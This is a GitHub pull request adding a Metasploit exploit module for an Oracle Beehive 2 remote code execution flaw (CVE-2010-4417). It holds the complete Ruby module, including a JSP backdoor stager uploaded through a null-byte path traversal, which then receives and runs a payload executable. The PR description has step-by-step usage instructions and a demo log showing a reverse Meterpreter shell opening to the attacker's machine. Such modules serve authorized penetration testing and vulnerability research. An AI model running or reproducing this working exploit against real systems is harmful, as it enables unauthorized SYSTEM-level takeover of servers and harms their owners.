### PR TITLE
Add Oracle Beehive processEvaluation Vulnerability

### DIFF
--- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb
+++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['Oracle Beehive 2', {}]
         ],
-      'Privileged'     => false,
+      'Privileged'     => true,
       'DisclosureDate' => 'Jun 09 2010',
       'DefaultTarget'  => 0))
 

--- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb
+++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Targeted path:
     # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa
     register_files_for_cleanup(
-      "../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/vnjHm.jsp"
+      "../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}"
     )
 
 

--- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb
+++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb
@@ -1,0 +1,156 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method
+        found in voice-servlet can be abused to write a malicious file onto the target machine, and
+        gain remote arbitrary code execution under the context of SYSTEM.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          '1c239c43f521145fa8385d64a9c32243',        # Found the vuln first
+          'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ (overlapped finding & PoC)
+          'sinn3r'                                   # Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2010-4417' ],
+          [ 'ZDI', '11-020' ],
+          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'RPORT' => 7777
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Oracle Beehive 2', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jun 09 2010',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp'))
+
+    if res && /RECXML Prompt Tester/ === res.body
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  def exploit
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::NotVulnerable, 'Target does not appear to be Oracle BeeHive')
+    end
+
+    # Init some names
+    exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe"
+    stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp"
+
+    print_status("Stager name is: #{stager_name}")
+    print_status("Executable name is: #{exe_name}")
+
+    # pwd:
+    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home
+    # Targeted path:
+    # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa
+    register_files_for_cleanup(
+      "../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/vnjHm.jsp"
+    )
+
+
+    # Ok fire!
+    print_status("Uploading stager...")
+    res = upload_stager(stager_name, exe_name)
+
+    # Hmm if we fail to upload the stager, no point to continue.
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out.')
+    end
+
+    print_status("Uploading payload...")
+    upload_payload(stager_name)
+  end
+
+
+  # Our stager is basically a backdoor that allows us to upload an executable with a POST request.
+  def get_jsp_stager(exe_name)
+    jsp = %Q|<%@ page import="java.io.*" %>
+<%
+  ByteArrayOutputStream buf = new ByteArrayOutputStream();
+  BufferedReader reader = request.getReader();
+  int tmp;
+  while ((tmp = reader.read()) != -1) { buf.write(tmp); }
+  FileOutputStream fostream = new FileOutputStream("#{exe_name}");
+  buf.writeTo(fostream);
+  fostream.close();
+  Runtime.getRuntime().exec("#{exe_name}");
+%>|
+
+    # Since we're sending it as a GET request, we want to keep it smaller so
+    # we gsub stuff we don't want.
+    jsp.gsub!("\n", '')
+    jsp.gsub!('  ', ' ')
+    Rex::Text.uri_encode(jsp)
+  end
+
+
+  # Stager will be found under:
+  # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\voice-servlet\prompt-qa\
+  def upload_stager(stager_name, exe_name)
+    jsp_stager = get_jsp_stager(exe_name)
+    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp')
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri,
+      'encode_params' => false, # Don't encode %00 for us
+      'vars_get' => {
+        'evaluation' => jsp_stager,
+        'recxml' => "..\\#{stager_name}%00"
+      }
+    })
+  end
+
+  # Payload will be found under:
+  # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\home\
+  def upload_payload(stager_name)
+    uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'data' => generate_payload_exe(code: payload.encoded)
+    })
+  end
+
+  def print_status(msg)
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
+end
+


### PR DESCRIPTION
This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM.
## Verification
- [ ] Set up a server-class Windows system. For example: Windows Server 2003.
- [ ] Install Oracle Database, such as [Oracle Database 11g](http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html).
- [ ] Install a vulnerable version of Oracle Beehive. For your reference, this exploit was written against Oracle Beehive 2.0.1.0.0. Note that Beehive is no longer available to download from Oracle, so either you already have it, or if you work with me, come find me.
- [ ] On the Windows test box, make sure port 7777 is listening. You can do this in the command prompt: `netstat -an | find "7777"`
- [ ] On the Windows test box, make sure it can ping the attacker's box. You can do this in the command prompt: `ping [attacker's IP]`
- [ ] Start msfconsole
- [ ] Do: `use exploit/windows/http/oracle_beehive_evaluation`
- [ ] Do: `set RHOST [target IP]`
- [ ] Do: `run` (it will automatically default to a windows/meterpreter/reverse_tcp payload)
- [ ] You should get a shell
## Demo

```
msf exploit(beehive) > rerun
[*] Reloading module...

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.109:7777 - Stager name is: ByxTm.jsp
[*] 192.168.1.109:7777 - Executable name is: TmANN.exe
[*] 192.168.1.109:7777 - Uploading stager...
[*] 192.168.1.109:7777 - Uploading payload...
[*] Sending stage (885806 bytes) to 192.168.1.109
[*] Meterpreter session 5 opened (192.168.1.64:4444 -> 192.168.1.109:3725) at 2015-10-16 00:58:13 -0500
[!] This exploit may require manual cleanup of '../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/vnjHm.jsp' on the target

meterpreter >
```
